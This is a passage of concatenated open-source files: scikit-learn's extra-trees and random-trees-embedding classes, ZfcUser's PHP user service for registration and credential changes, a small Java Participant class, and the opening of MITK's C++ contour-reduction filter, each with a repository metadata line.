        .. versionchanged:: 0.18
           Added float values for fractions.
    min_weight_fraction_leaf : float, default=0.0
        The minimum weighted fraction of the sum total of weights (of all
        the input samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided.
    max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a fraction and
          `round(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=n_features`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
    max_leaf_nodes : int, default=None
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
    min_impurity_decrease : float, default=0.0
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.
        The weighted impurity decrease equation is the following::
            N_t / N * (impurity - N_t_R / N_t * right_impurity
                    - N_t_L / N_t * left_impurity)
        where ``N`` is the total number of samples, ``N_t`` is the number of
        samples at the current node, ``N_t_L`` is the number of samples in the
        left child, and ``N_t_R`` is the number of samples in the right child.
        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.
        .. versionadded:: 0.19
    min_impurity_split : float, default=None
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.
        .. deprecated:: 0.19
           ``min_impurity_split`` has been deprecated in favor of
           ``min_impurity_decrease`` in 0.19. The default value of
           ``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
           will be removed in 1.0 (renaming of 0.25).
           Use ``min_impurity_decrease`` instead.
    bootstrap : bool, default=False
        Whether bootstrap samples are used when building trees. If False, the
        whole dataset is used to build each tree.
    oob_score : bool, default=False
        Whether to use out-of-bag samples to estimate the generalization score.
        Only available if bootstrap=True.
    n_jobs : int, default=None
        The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
        :meth:`decision_path` and :meth:`apply` are all parallelized over the
        trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
        context. ``-1`` means using all processors. See :term:`Glossary
        <n_jobs>` for more details.
    random_state : int, RandomState instance or None, default=None
        Controls 3 sources of randomness:
        - the bootstrapping of the samples used when building trees
          (if ``bootstrap=True``)
        - the sampling of the features to consider when looking for the best
          split at each node (if ``max_features < n_features``)
        - the draw of the splits for each of the `max_features`
        See :term:`Glossary <random_state>` for details.
    verbose : int, default=0
        Controls the verbosity when fitting and predicting.
    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.
    ccp_alpha : non-negative float, default=0.0
        Complexity parameter used for Minimal Cost-Complexity Pruning. The
        subtree with the largest cost complexity that is smaller than
        ``ccp_alpha`` will be chosen. By default, no pruning is performed. See
        :ref:`minimal_cost_complexity_pruning` for details.
        .. versionadded:: 0.22
    max_samples : int or float, default=None
        If bootstrap is True, the number of samples to draw from X
        to train each base estimator.
        - If None (default), then draw `X.shape[0]` samples.
        - If int, then draw `max_samples` samples.
        - If float, then draw `max_samples * X.shape[0]` samples. Thus,
          `max_samples` should be in the interval `(0.0, 1.0]`.
        .. versionadded:: 0.22
    Attributes
    ----------
    base_estimator_ : ExtraTreeRegressor
        The child estimator template used to create the collection of fitted
        sub-estimators.
    estimators_ : list of ExtraTreeRegressor
        The collection of fitted sub-estimators.
    feature_importances_ : ndarray of shape (n_features,)
        The impurity-based feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature.  It is also
        known as the Gini importance.
        Warning: impurity-based feature importances can be misleading for
        high cardinality features (many unique values). See
        :func:`sklearn.inspection.permutation_importance` as an alternative.
    n_features_ : int
        The number of features.
        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.
    n_features_in_ : int
        Number of features seen during :term:`fit`.
        .. versionadded:: 0.24
    n_outputs_ : int
        The number of outputs.
    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
        This attribute exists only when ``oob_score`` is True.
    oob_prediction_ : ndarray of shape (n_samples,) or (n_samples, n_outputs)
        Prediction computed with out-of-bag estimate on the training set.
        This attribute exists only when ``oob_score`` is True.
    See Also
    --------
    sklearn.tree.ExtraTreeRegressor : Base estimator for this ensemble.
    RandomForestRegressor : Ensemble regressor using trees with optimal splits.
    Notes
    -----
    The default values for the parameters controlling the size of the trees
    (e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
    unpruned trees which can potentially be very large on some data sets. To
    reduce memory consumption, the complexity and size of the trees should be
    controlled by setting those parameter values.
    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    Examples
    --------
    >>> from sklearn.datasets import load_diabetes
    >>> from sklearn.model_selection import train_test_split
    >>> from sklearn.ensemble import ExtraTreesRegressor
    >>> X, y = load_diabetes(return_X_y=True)
    >>> X_train, X_test, y_train, y_test = train_test_split(
    ...     X, y, random_state=0)
    >>> reg = ExtraTreesRegressor(n_estimators=100, random_state=0).fit(
    ...    X_train, y_train)
    >>> reg.score(X_test, y_test)
    0.2708...
    """
    def __init__(self,
                 n_estimators=100, *,
                 criterion="squared_error",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 min_impurity_split=None,
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 ccp_alpha=0.0,
                 max_samples=None):
        # ``estimator_params`` names the constructor arguments forwarded
        # verbatim to every ExtraTreeRegressor in the ensemble.
        super().__init__(
            base_estimator=ExtraTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "min_impurity_decrease", "min_impurity_split",
                              "random_state", "ccp_alpha"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            max_samples=max_samples)
        # Tree-level hyper-parameters are stored on ``self`` so that
        # ``get_params``/``set_params`` (and therefore ``clone``) see them.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_decrease = min_impurity_decrease
        self.min_impurity_split = min_impurity_split
        self.ccp_alpha = ccp_alpha
class RandomTreesEmbedding(BaseForest):
    """
    An ensemble of totally random trees.
    An unsupervised transformation of a dataset to a high-dimensional
    sparse representation. A datapoint is coded according to which leaf of
    each tree it is sorted into. Using a one-hot encoding of the leaves,
    this leads to a binary coding with as many ones as there are trees in
    the forest.
    The dimensionality of the resulting representation is
    ``n_out <= n_estimators * max_leaf_nodes``. If ``max_leaf_nodes == None``,
    the number of leaf nodes is at most ``n_estimators * 2 ** max_depth``.
    Read more in the :ref:`User Guide <random_trees_embedding>`.
    Parameters
    ----------
    n_estimators : int, default=100
        Number of trees in the forest.
        .. versionchanged:: 0.22
           The default value of ``n_estimators`` changed from 10 to 100
           in 0.22.
    max_depth : int, default=5
        The maximum depth of each tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
    min_samples_split : int or float, default=2
        The minimum number of samples required to split an internal node:
        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` is the minimum
          number of samples for each split.
        .. versionchanged:: 0.18
           Added float values for fractions.
    min_samples_leaf : int or float, default=1
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` training samples in each of the left and
        right branches.  This may have the effect of smoothing the model,
        especially in regression.
        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` is the minimum
          number of samples for each node.
        .. versionchanged:: 0.18
           Added float values for fractions.
    min_weight_fraction_leaf : float, default=0.0
        The minimum weighted fraction of the sum total of weights (of all
        the input samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided.
    max_leaf_nodes : int, default=None
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
    min_impurity_decrease : float, default=0.0
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.
        The weighted impurity decrease equation is the following::
            N_t / N * (impurity - N_t_R / N_t * right_impurity
                    - N_t_L / N_t * left_impurity)
        where ``N`` is the total number of samples, ``N_t`` is the number of
        samples at the current node, ``N_t_L`` is the number of samples in the
        left child, and ``N_t_R`` is the number of samples in the right child.
        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.
        .. versionadded:: 0.19
    min_impurity_split : float, default=None
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.
        .. deprecated:: 0.19
           ``min_impurity_split`` has been deprecated in favor of
           ``min_impurity_decrease`` in 0.19. The default value of
           ``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
           will be removed in 1.0 (renaming of 0.25).
           Use ``min_impurity_decrease`` instead.
    sparse_output : bool, default=True
        Whether or not to return a sparse CSR matrix, as default behavior,
        or to return a dense array compatible with dense pipeline operators.
    n_jobs : int, default=None
        The number of jobs to run in parallel. :meth:`fit`, :meth:`transform`,
        :meth:`decision_path` and :meth:`apply` are all parallelized over the
        trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
        context. ``-1`` means using all processors. See :term:`Glossary
        <n_jobs>` for more details.
    random_state : int, RandomState instance or None, default=None
        Controls the generation of the random `y` used to fit the trees
        and the draw of the splits for each feature at the trees' nodes.
        See :term:`Glossary <random_state>` for details.
    verbose : int, default=0
        Controls the verbosity when fitting and predicting.
    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.
    Attributes
    ----------
    base_estimator_ : ExtraTreeRegressor instance
        The child estimator template used to create the collection of fitted
        sub-estimators.
    estimators_ : list of ExtraTreeRegressor instances
        The collection of fitted sub-estimators.
    feature_importances_ : ndarray of shape (n_features,)
        The feature importances (the higher, the more important the feature).
    n_features_ : int
        The number of features when ``fit`` is performed.
        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.
    n_features_in_ : int
        Number of features seen during :term:`fit`.
        .. versionadded:: 0.24
    n_outputs_ : int
        The number of outputs when ``fit`` is performed.
    one_hot_encoder_ : OneHotEncoder instance
        One-hot encoder used to create the sparse embedding.
    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    .. [2] Moosmann, F. and Triggs, B. and Jurie, F.  "Fast discriminative
           visual codebooks using randomized clustering forests"
           NIPS 2007
    Examples
    --------
    >>> from sklearn.ensemble import RandomTreesEmbedding
    >>> X = [[0,0], [1,0], [0,1], [-1,0], [0,-1]]
    >>> random_trees = RandomTreesEmbedding(
    ...    n_estimators=5, random_state=0, max_depth=1).fit(X)
    >>> X_sparse_embedding = random_trees.transform(X)
    >>> X_sparse_embedding.toarray()
    array([[0., 1., 1., 0., 1., 0., 0., 1., 1., 0.],
           [0., 1., 1., 0., 1., 0., 0., 1., 1., 0.],
           [0., 1., 0., 1., 0., 1., 0., 1., 0., 1.],
           [1., 0., 1., 0., 1., 0., 1., 0., 1., 0.],
           [0., 1., 1., 0., 1., 0., 0., 1., 1., 0.]])
    """
    # Fixed (non-tunable) tree settings: splits are scored with the
    # squared-error criterion and only a single feature is considered at
    # each split, which is what makes the trees "totally random".
    criterion = "squared_error"
    max_features = 1
    def __init__(self,
                 n_estimators=100, *,
                 max_depth=5,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 min_impurity_split=None,
                 sparse_output=True,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        # Bootstrapping and OOB scoring are disabled: every tree is fitted
        # on the full dataset (see also _set_oob_score_and_attributes).
        super().__init__(
            base_estimator=ExtraTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "min_impurity_decrease", "min_impurity_split",
                              "random_state"),
            bootstrap=False,
            oob_score=False,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            max_samples=None)
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_decrease = min_impurity_decrease
        self.min_impurity_split = min_impurity_split
        self.sparse_output = sparse_output
    def _set_oob_score_and_attributes(self, X, y):
        # Out-of-bag estimates are undefined for this unsupervised,
        # non-bootstrapped embedding, so the base-class hook is disabled.
        raise NotImplementedError("OOB score not supported by tree embedding")
    def fit(self, X, y=None, sample_weight=None):
        """
        Fit estimator.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Use ``dtype=np.float32`` for maximum
            efficiency. Sparse matrices are also supported, use sparse
            ``csc_matrix`` for maximum efficiency.
        y : Ignored
            Not used, present for API consistency by convention.
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights. If None, then samples are equally weighted. Splits
            that would create child nodes with net zero or negative weight are
            ignored while searching for a split in each node. In the case of
            classification, splits are also ignored if they would result in any
            single class carrying a negative weight in either child node.
        Returns
        -------
        self : object
        """
        # Delegates to fit_transform and discards the transformed output.
        self.fit_transform(X, y, sample_weight=sample_weight)
        return self
    def fit_transform(self, X, y=None, sample_weight=None):
        """
        Fit estimator and transform dataset.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data used to build forests. Use ``dtype=np.float32`` for
            maximum efficiency.
        y : Ignored
            Not used, present for API consistency by convention.
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights. If None, then samples are equally weighted. Splits
            that would create child nodes with net zero or negative weight are
            ignored while searching for a split in each node. In the case of
            classification, splits are also ignored if they would result in any
            single class carrying a negative weight in either child node.
        Returns
        -------
        X_transformed : sparse matrix of shape (n_samples, n_out)
            Transformed dataset.
        """
        X = self._validate_data(X, accept_sparse=['csc'])
        if issparse(X):
            # Pre-sort indices to avoid that each individual tree of the
            # ensemble sorts the indices.
            X.sort_indices()
        # The trees are fitted against a uniformly random target, so the
        # learned partitioning does not depend on any real labels.
        rnd = check_random_state(self.random_state)
        y = rnd.uniform(size=X.shape[0])
        super().fit(X, y, sample_weight=sample_weight)
        # One-hot encode the leaf index each sample lands in for each tree.
        self.one_hot_encoder_ = OneHotEncoder(sparse=self.sparse_output)
        return self.one_hot_encoder_.fit_transform(self.apply(X))
    def transform(self, X):
        """
        Transform dataset.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data to be transformed. Use ``dtype=np.float32`` for maximum
            efficiency. Sparse matrices are also supported, use sparse
            ``csr_matrix`` for maximum efficiency.
        Returns
        -------
        X_transformed : sparse matrix of shape (n_samples, n_out)
            Transformed dataset.
        """
        check_is_fitted(self)
        # Reuse the encoder fitted in fit_transform on the new leaf indices.
        return self.one_hot_encoder_.transform(self.apply(X))
| kevin-intel/scikit-learn | sklearn/ensemble/_forest.py | Python | bsd-3-clause | 102,940 |
<?php
namespace ZfcUser\Service;
use Interop\Container\ContainerInterface;
use Zend\Authentication\AuthenticationService;
use Zend\Form\Form;
use Zend\ServiceManager\ServiceManager;
use Zend\Crypt\Password\Bcrypt;
use Zend\Hydrator;
use ZfcUser\EventManager\EventProvider;
use ZfcUser\Mapper\UserInterface as UserMapperInterface;
use ZfcUser\Options\UserServiceOptionsInterface;
class User extends EventProvider
{
    /**
     * Mapper used to persist and load user entities.
     *
     * @var UserMapperInterface
     */
    protected $userMapper;
    /**
     * @var AuthenticationService
     */
    protected $authService;
    /**
     * @var Form
     */
    protected $loginForm;
    /**
     * @var Form
     */
    protected $registerForm;
    /**
     * @var Form
     */
    protected $changePasswordForm;
    /**
     * @var ServiceManager
     */
    protected $serviceManager;
    /**
     * @var UserServiceOptionsInterface
     */
    protected $options;
    /**
     * @var Hydrator\ClassMethods
     */
    protected $formHydrator;
    /**
     * Create and persist a new user from raw registration form data.
     *
     * Triggers the "register" event before the insert and "register.post"
     * after it, passing the user entity and the bound form to listeners.
     *
     * @param array $data raw form data (may contain 'username' and
     *                    'display_name' depending on module options)
     * @return \ZfcUser\Entity\UserInterface|false the persisted user, or
     *                    false when the registration form does not validate
     */
    public function register(array $data)
    {
        $class = $this->getOptions()->getUserEntityClass();
        $user = new $class;
        $form = $this->getRegisterForm();
        $form->setHydrator($this->getFormHydrator());
        $form->bind($user);
        $form->setData($data);
        if (!$form->isValid()) {
            return false;
        }
        $user = $form->getData();
        /* @var $user \ZfcUser\Entity\UserInterface */
        // Hash the plain-text password before it is persisted.
        $bcrypt = new Bcrypt;
        $bcrypt->setCost($this->getOptions()->getPasswordCost());
        $user->setPassword($bcrypt->create($user->getPassword()));
        if ($this->getOptions()->getEnableUsername()) {
            $user->setUsername($data['username']);
        }
        if ($this->getOptions()->getEnableDisplayName()) {
            $user->setDisplayName($data['display_name']);
        }
        // If user state is enabled, set the default state value
        if ($this->getOptions()->getEnableUserState()) {
            $user->setState($this->getOptions()->getDefaultUserState());
        }
        $this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $user, 'form' => $form));
        $this->getUserMapper()->insert($user);
        $this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $user, 'form' => $form));
        return $user;
    }
    /**
     * change the current users password
     *
     * The old password ($data['credential']) is re-verified against the
     * stored hash before the new one ($data['newCredential']) is applied.
     * Triggers "changePassword" before and "changePassword.post" after the
     * mapper update.
     *
     * @param array $data expects keys 'credential' and 'newCredential'
     * @return boolean false when the old password does not verify
     */
    public function changePassword(array $data)
    {
        $currentUser = $this->getAuthService()->getIdentity();
        $oldPass = $data['credential'];
        $newPass = $data['newCredential'];
        $bcrypt = new Bcrypt;
        $bcrypt->setCost($this->getOptions()->getPasswordCost());
        if (!$bcrypt->verify($oldPass, $currentUser->getPassword())) {
            return false;
        }
        $pass = $bcrypt->create($newPass);
        $currentUser->setPassword($pass);
        $this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $currentUser, 'data' => $data));
        $this->getUserMapper()->update($currentUser);
        $this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $currentUser, 'data' => $data));
        return true;
    }
    /**
     * Change the authenticated user's e-mail address.
     *
     * The current password ($data['credential']) is re-verified before the
     * address is replaced with $data['newIdentity']. Triggers "changeEmail"
     * before and "changeEmail.post" after the mapper update.
     *
     * @param array $data expects keys 'credential' and 'newIdentity'
     * @return boolean false when the password check fails, true otherwise
     */
    public function changeEmail(array $data)
    {
        $currentUser = $this->getAuthService()->getIdentity();
        $bcrypt = new Bcrypt;
        $bcrypt->setCost($this->getOptions()->getPasswordCost());
        if (!$bcrypt->verify($data['credential'], $currentUser->getPassword())) {
            return false;
        }
        $currentUser->setEmail($data['newIdentity']);
        $this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $currentUser, 'data' => $data));
        $this->getUserMapper()->update($currentUser);
        $this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $currentUser, 'data' => $data));
        return true;
    }
    /**
     * getUserMapper
     *
     * Lazily resolved from the service manager on first access.
     *
     * @return UserMapperInterface
     */
    public function getUserMapper()
    {
        if (null === $this->userMapper) {
            $this->userMapper = $this->getServiceManager()->get('zfcuser_user_mapper');
        }
        return $this->userMapper;
    }
    /**
     * setUserMapper
     *
     * @param UserMapperInterface $userMapper
     * @return User
     */
    public function setUserMapper(UserMapperInterface $userMapper)
    {
        $this->userMapper = $userMapper;
        return $this;
    }
    /**
     * getAuthService
     *
     * Lazily resolved from the service manager on first access.
     *
     * @return AuthenticationService
     */
    public function getAuthService()
    {
        if (null === $this->authService) {
            $this->authService = $this->getServiceManager()->get('zfcuser_auth_service');
        }
        return $this->authService;
    }
    /**
     * setAuthenticationService
     *
     * @param AuthenticationService $authService
     * @return User
     */
    public function setAuthService(AuthenticationService $authService)
    {
        $this->authService = $authService;
        return $this;
    }
    /**
     * @return Form
     */
    public function getRegisterForm()
    {
        if (null === $this->registerForm) {
            $this->registerForm = $this->getServiceManager()->get('zfcuser_register_form');
        }
        return $this->registerForm;
    }
    /**
     * @param Form $registerForm
     * @return User
     */
    public function setRegisterForm(Form $registerForm)
    {
        $this->registerForm = $registerForm;
        return $this;
    }
    /**
     * @return Form
     */
    public function getChangePasswordForm()
    {
        if (null === $this->changePasswordForm) {
            $this->changePasswordForm = $this->getServiceManager()->get('zfcuser_change_password_form');
        }
        return $this->changePasswordForm;
    }
    /**
     * @param Form $changePasswordForm
     * @return User
     */
    public function setChangePasswordForm(Form $changePasswordForm)
    {
        $this->changePasswordForm = $changePasswordForm;
        return $this;
    }
    /**
     * get service options
     *
     * Falls back to the 'zfcuser_module_options' service when not set.
     *
     * @return UserServiceOptionsInterface
     */
    public function getOptions()
    {
        if (!$this->options instanceof UserServiceOptionsInterface) {
            $this->setOptions($this->getServiceManager()->get('zfcuser_module_options'));
        }
        return $this->options;
    }
    /**
     * set service options
     *
     * @param UserServiceOptionsInterface $options
     */
    public function setOptions(UserServiceOptionsInterface $options)
    {
        $this->options = $options;
    }
    /**
     * Retrieve service manager instance
     *
     * @return ServiceManager
     */
    public function getServiceManager()
    {
        return $this->serviceManager;
    }
    /**
     * Set service manager instance
     *
     * @param ContainerInterface $serviceManager
     * @return User
     */
    public function setServiceManager(ContainerInterface $serviceManager)
    {
        $this->serviceManager = $serviceManager;
        return $this;
    }
    /**
     * Return the Form Hydrator
     *
     * Lazily resolved from the service manager on first access.
     *
     * @return \Zend\Hydrator\ClassMethods
     */
    public function getFormHydrator()
    {
        if (!$this->formHydrator instanceof Hydrator\HydratorInterface) {
            $this->setFormHydrator($this->getServiceManager()->get('zfcuser_register_form_hydrator'));
        }
        return $this->formHydrator;
    }
    /**
     * Set the Form Hydrator to use
     *
     * @param Hydrator\HydratorInterface $formHydrator
     * @return User
     */
    public function setFormHydrator(Hydrator\HydratorInterface $formHydrator)
    {
        $this->formHydrator = $formHydrator;
        return $this;
    }
}
| ZF-Commons/ZfcUser | src/ZfcUser/Service/User.php | PHP | bsd-3-clause | 7,992 |
package synergynet3.web.apps.numbernet.shared;
import java.io.Serializable;
import com.google.gwt.user.client.rpc.IsSerializable;
/**
* Represents an individual person.
*
* @author dcs0ah1
*/
public class Participant implements Serializable, IsSerializable
{
	/** Serialization version marker; must stay stable across releases. */
	private static final long serialVersionUID = 2647062936457560005L;

	/** The participant's display name; "&lt;none&gt;" when not yet assigned. */
	private String name;

	/**
	 * Creates a participant with the placeholder name "&lt;none&gt;".
	 * (A zero-argument constructor is also required for GWT serialization.)
	 */
	public Participant()
	{
		this("<none>");
	}

	/**
	 * Creates a participant with the supplied name.
	 *
	 * @param name
	 *            the participant's name
	 */
	public Participant(String name)
	{
		this.name = name;
	}

	/**
	 * Returns this participant's name.
	 *
	 * @return the name
	 */
	public String getName()
	{
		return name;
	}

	/**
	 * The textual form of a participant is simply its name.
	 */
	@Override
	public String toString()
	{
		return getName();
	}
}
| synergynet/synergynet3.1 | synergynet3.1-parent/synergynet3-numbernet-core/src/main/java/synergynet3/web/apps/numbernet/shared/Participant.java | Java | bsd-3-clause | 896 |
/*===================================================================
The Medical Imaging Interaction Toolkit (MITK)
Copyright (c) German Cancer Research Center,
Division of Medical and Biological Informatics.
All rights reserved.
This software is distributed WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR
A PARTICULAR PURPOSE.
See LICENSE.txt or http://www.mitk.org for details.
===================================================================*/
#include "mitkReduceContourSetFilter.h"
// Initializes the filter with Douglas-Peucker reduction, a step size of 10,
// and sentinel values (-1) for tolerance and spacings, meaning "not yet set".
// Also installs one empty Surface as the initial output.
mitk::ReduceContourSetFilter::ReduceContourSetFilter()
{
  m_MaxSegmentLenght = 0;
  m_StepSize = 10;
  m_Tolerance = -1; // -1: tolerance is derived later from spacing (see DP reduction)
  m_ReductionType = DOUGLAS_PEUCKER;
  m_MaxSpacing = -1;
  m_MinSpacing = -1;
  this->m_UseProgressBar = false;
  this->m_ProgressStepSize = 1;
  m_NumberOfPointsAfterReduction = 0;
  mitk::Surface::Pointer output = mitk::Surface::New();
  this->SetNthOutput(0, output.GetPointer());
}
// No manual cleanup is performed here.
mitk::ReduceContourSetFilter::~ReduceContourSetFilter()
{
}
// Registers |surface| as the idx-th input and marks the filter modified so
// the pipeline re-executes on the next update.
void mitk::ReduceContourSetFilter::SetInput( unsigned int idx, const mitk::Surface* surface )
{
  this->SetNthInput( idx, const_cast<mitk::Surface*>( surface ) );
  this->Modified();
}
// Convenience overload: registers |surface| as input 0.
void mitk::ReduceContourSetFilter::SetInput( const mitk::Surface* surface )
{
  this->SetInput( 0, const_cast<mitk::Surface*>( surface ) );
}
// For each input surface, walks all its polygons, drops polygons classified as
// pure intersection contours (CheckForIntersection), reduces the remaining
// ones with either the nth-point or Douglas-Peucker scheme, and emits one
// output Surface per input that still has polygons left. Inputs whose reduced
// polygons are all empty produce no output, so output indices need not match
// input indices.
void mitk::ReduceContourSetFilter::GenerateData()
{
  unsigned int numberOfInputs = this->GetNumberOfIndexedInputs();
  unsigned int numberOfOutputs (0);
  vtkSmartPointer<vtkPolyData> newPolyData;
  vtkSmartPointer<vtkCellArray> newPolygons;
  vtkSmartPointer<vtkPoints> newPoints;
  //For the purpose of evaluation
  // unsigned int numberOfPointsBefore (0);
  m_NumberOfPointsAfterReduction=0;
  for(unsigned int i = 0; i < numberOfInputs; i++)
  {
    mitk::Surface* currentSurface = const_cast<mitk::Surface*>( this->GetInput(i) );
    vtkSmartPointer<vtkPolyData> polyData = currentSurface->GetVtkPolyData();
    newPolyData = vtkSmartPointer<vtkPolyData>::New();
    newPolygons = vtkSmartPointer<vtkCellArray>::New();
    newPoints = vtkSmartPointer<vtkPoints>::New();
    vtkSmartPointer<vtkCellArray> existingPolys = polyData->GetPolys();
    vtkSmartPointer<vtkPoints> existingPoints = polyData->GetPoints();
    existingPolys->InitTraversal();
    vtkIdType* cell (nullptr);
    vtkIdType cellSize (0);
    for( existingPolys->InitTraversal(); existingPolys->GetNextCell(cellSize, cell);)
    {
      // Skip polygons that only exist as intersections of other inputs'
      // polygons with this plane.
      bool incorporatePolygon = this->CheckForIntersection(cell,cellSize,existingPoints, /*numberOfIntersections, intersectionPoints, */i);
      if ( !incorporatePolygon ) continue;
      vtkSmartPointer<vtkPolygon> newPolygon = vtkSmartPointer<vtkPolygon>::New();
      if(m_ReductionType == NTH_POINT)
      {
        this->ReduceNumberOfPointsByNthPoint(cellSize, cell, existingPoints, newPolygon, newPoints);
        if (newPolygon->GetPointIds()->GetNumberOfIds() != 0)
        {
          newPolygons->InsertNextCell(newPolygon);
        }
      }
      else if (m_ReductionType == DOUGLAS_PEUCKER)
      {
        // Only keep reduced polygons with more than 3 points; smaller ones
        // are degenerate.
        this->ReduceNumberOfPointsByDouglasPeucker(cellSize, cell, existingPoints, newPolygon, newPoints);
        if (newPolygon->GetPointIds()->GetNumberOfIds() > 3)
        {
          newPolygons->InsertNextCell(newPolygon);
        }
      }
      //Again for evaluation
      // numberOfPointsBefore += cellSize;
      m_NumberOfPointsAfterReduction += newPolygon->GetPointIds()->GetNumberOfIds();
    }
    if (newPolygons->GetNumberOfCells() != 0)
    {
      newPolyData->SetPolys(newPolygons);
      newPolyData->SetPoints(newPoints);
      newPolyData->BuildLinks();
      this->SetNumberOfIndexedOutputs(numberOfOutputs + 1);
      mitk::Surface::Pointer surface = mitk::Surface::New();
      this->SetNthOutput(numberOfOutputs, surface.GetPointer());
      surface->SetVtkPolyData(newPolyData);
      numberOfOutputs++;
    }
  }
  // MITK_INFO<<"Points before: "<<numberOfPointsBefore<<" ##### Points after: "<<numberOfPointsAfter;
  this->SetNumberOfIndexedOutputs(numberOfOutputs);
  if (numberOfOutputs == 0)
  {
    // Guarantee at least one (empty) output so downstream filters never see
    // a filter without outputs.
    mitk::Surface::Pointer tmp_output = mitk::Surface::New();
    tmp_output->SetVtkPolyData(vtkPolyData::New());
    this->SetNthOutput(0, tmp_output.GetPointer());
  }
  //Setting progressbar
  if (this->m_UseProgressBar)
    mitk::ProgressBar::GetInstance()->Progress(this->m_ProgressStepSize);
}
// Keeps every m_StepSize-th point of the input polygon (cell) and closes the
// contour by re-adding the first point as the last id. Polygons that would
// shrink to 3 or fewer points are left empty (early return), which the caller
// interprets as "drop this polygon".
